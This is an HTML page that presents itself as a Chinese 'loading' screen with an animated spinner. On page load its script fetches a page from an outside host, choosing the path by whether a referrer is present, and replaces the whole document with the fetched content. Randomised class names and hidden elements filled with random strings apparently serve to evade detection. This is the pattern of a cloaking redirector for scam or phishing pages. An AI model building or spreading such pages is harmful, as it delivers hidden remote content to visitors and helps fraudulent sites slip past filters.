<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .xZ8seF {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .xZ8seF .tbo9OLjoyaA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .xZ8seF .content {
            line-height: 50px;
            text-align: center
        }

        .xZ8seF .img {
            width: 100%
        }

        .xZ8seF .eeCwNTO {
            text-align: center
        }

        .xZ8seF .eeCwNTO span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .xZ8seF .eeCwNTO span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .xZ8seF .eeCwNTO span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .xZ8seF .eeCwNTO span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .xZ8seF .eeCwNTO span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .xZ8seF .eeCwNTO span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .xZ8seF .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function EaEpEJbH1(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iQpMv = EaEpEJbH1('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iQpMv +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iQpMv +".html?a=share";
		}
		
        vnDVQksZ=url+"#"+new Date().getTime();
        vnDVQksZ && function() {
            $.get(vnDVQksZ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>GsX3649ZIPYn8RHywgikugFSVFOBvo87Kd3Vrgh</a>
<a  href='#' style='display:none'>GsX3649ZIPYn8RHywgikugFSVFOBvo87Kd3Vrgh</a>
<div style='display:none'>tu09b0RrHNEHWbQKh6QN2FB3X3GLJy71</div>
<h1 style='display:none' >cP8pVO78ObKxwsQaP1fpZarF47NiqmbYaD3vTTx1khs9K4YdQt58YC2uLDhb</h1>
<span style='display:none'>ugwJ0wdDW4AnqgomN15xnzJ8UFnO1qSxx3fnibVrvOjOQnyB7QchAh1R5aYn1DEeJTlU7ou1NBkc5U</span>
<a  href='#' style='display:none'>GsX3649ZIPYn8RHywgikugFSVFOBvo87Kd3Vrgh</a>
<span style='display:none'>ugwJ0wdDW4AnqgomN15xnzJ8UFnO1qSxx3fnibVrvOjOQnyB7QchAh1R5aYn1DEeJTlU7ou1NBkc5U</span>
<a  href='#' style='display:none'>GsX3649ZIPYn8RHywgikugFSVFOBvo87Kd3Vrgh</a>
<span style='display:none'>ugwJ0wdDW4AnqgomN15xnzJ8UFnO1qSxx3fnibVrvOjOQnyB7QchAh1R5aYn1DEeJTlU7ou1NBkc5U</span>
<b style='display:none' >wGrgxAT8KZZwhOwU3o5tJg19pXKg3ImG920rGTDeqVpwcqUYXpBuHqsuP1cBjANEcgX9n34Dnw1zaCsBRduNaSahHUeGdAl59e</b><div class="xZ8seF">
    <div class="tbo9OLjoyaA">
        <div class="eeCwNTO">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<b style='display:none' >PP3BWtvH90ArlXTuCAP</b>
<b style='display:none' >PP3BWtvH90ArlXTuCAP</b>
<b style='display:none' >PP3BWtvH90ArlXTuCAP</b>
<a  href='#' style='display:none'>Om7axolHgIzoWYJkRkFQGD201AN2mEVXKy0u7er</a>
<p  style='display:none'>bnizcsNRzgCqC1rM5e0wVjDhkSkvAOL5RBxk5vgtRxY3uODqf60zNbPF2eUZgoxTkrL0KIrabvSIhXYtm1QXBRV5VOh0eUfFwz3</p>
<h1 style='display:none' >N6sprpUwq7i9Uhi2D6xp3U75CFDWjg2g58VhQ</h1>
<ul style='display:none' >cdlKwoi8pCu75F2ZRiQ2NB2QAYCvz6mkEWPmKPr1AWcNHnp73a6LA6UsXIzzckxsk</ul>
<span style='display:none'>e23RmpFOz2QKfu</span>
<li style='display:none' >xz8gqFAI4i2iUSecCkjh4UYbC3EXVPENZWE0lgq</li></body>
</html>